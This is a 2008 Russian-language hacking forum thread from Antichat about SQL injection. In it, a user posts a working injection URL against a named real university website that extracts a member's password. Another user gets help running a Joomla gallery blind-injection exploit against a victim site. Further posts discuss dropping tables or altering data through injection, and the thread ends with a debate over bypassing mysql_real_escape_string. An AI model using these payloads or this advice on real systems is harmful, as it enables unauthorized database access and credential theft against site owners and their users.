ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

29.05.2008, 23:45
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме: 1404552
Репутация:
568
|
|
Qwazar
спс. есть))
http://www.bmcc.cuny.edu/gallery/category.jsp?cat_id=1'+union+select+null,to_char(p assword),null,null,null,null,null,null,null,null+f rom+members+where+member_id=2--
Последний раз редактировалось sabe; 30.05.2008 в 00:42..
|
|
|

29.05.2008, 23:58
|
|
Познающий
Регистрация: 21.03.2008
Сообщений: 39
Провел на форуме: 99208
Репутация:
21
|
|
Здравствуйте, подскажите пожалуйста, как быть, у меня есть эксплоит для Joomla DatsoGallery 1.6 Blind SQL Injection, чтобы его запустить в командной строке Windows с начало прописываю путь до php, а затем через пробел, путь до експлойта, я так понял два параметра последних не обязательны, ввожу имя сайта, а он выдает ошибку 404. Подскажите что я делаю не так и как лучше этот скрипт использовать?
сам он тут - securitylab.ru/poc/extra/352779.php
|
|
|

30.05.2008, 00:36
|
|
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме: 9751379
Репутация:
3812
|
|
Сообщение от Spaise
Здравствуйте, подскажите пожалуйста, как быть, у меня есть эксплоит для Joomla DatsoGallery 1.6 Blind SQL Injection, чтобы его запустить в командной строке Windows с начало прописываю путь до php, а затем через пробел, путь до експлойта, я так понял два параметра последних не обязательны, ввожу имя сайта, а он выдает ошибку 404. Подскажите что я делаю не так и как лучше этот скрипт использовать?
сам он тут - securitylab.ru/poc/extra/352779.php
Он запускается из браузера.
Код:
http://site.ru/datso_xpl.php?url=http://victim.com/joomla_path/
__________________
|
|
|

30.05.2008, 00:46
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме: 1404552
Репутация:
568
|
|
нащет удаления баз или таблиц, drop table?
и как можно внести изменения в поле, insert into?
можете навести пример или другие варианты..?
Последний раз редактировалось sabe; 30.05.2008 в 00:51..
|
|
|

30.05.2008, 00:57
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме: 21768337
Репутация:
3486
|
|
Если мускул, то никак. Нету разделения запросов. Если инъекция в селекте, то и будет выполнятся только селект.
|
|
|

30.05.2008, 01:19
|
|
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме: 9751379
Репутация:
3812
|
|
Сообщение от .Slip
Если мускул, то никак. Нету разделения запросов. Если инъекция в селекте, то и будет выполнятся только селект.
разделение запросов может быть если делать mysql_real_connect()
Если инъекция в инсерте, то можно воспользоваться конструкцией INSERT ... ON DUPLICATE KEY UPDATE и провести апдейт нужной таблицы (при определённых обстоятельствах конечно)).
__________________
|
|
|

30.05.2008, 01:28
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме: 1404552
Репутация:
568
|
|
ок. спс за идеи) как нить реализую при определённых обстоятельствах..)
|
|
|

30.05.2008, 04:38
|
|
Новичок
Регистрация: 31.12.2007
Сообщений: 26
Провел на форуме: 482650
Репутация:
1
|
|
сорри за тупой вопрос, тут есть скуля?
PHP код:
$gname = $_GET['n'];
try{
// 1) Get guild description
$pdb = dbLayer::getCharDB();
$gname = mysql_real_escape_string($gname); // SQL injection prevention
$pdb->Execute("SELECT * FROM guilds WHERE guildName='$gname'");
if( !($guild = $pdb->Fetch()) ) throw new Exception('There is no guild "'.$gname.'" in database.');
|
|
|

30.05.2008, 07:16
|
|
Постоянный
Регистрация: 06.12.2006
Сообщений: 321
Провел на форуме: 1536533
Репутация:
370
|
|
NAT_uu, экранирование кавычки есть и скуля есть, если ты сумеешь экранирование обойти.
|
|
|

30.05.2008, 12:26
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме: 17621293
Репутация:
4915
|
|
Сообщение от Lesnoy_chelovek
NAT_uu, экранирование кавычки есть и скуля есть, если ты сумеешь экранирование обойти.
Очень интересно.Функция mysql_real_escape_string как раз и позволяет защититься от инъекции .Если есть способ обхода, хотелось бы увидеть
2 NAT_uu ИМХО в этом скрипте инъекцию не проведёшь
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|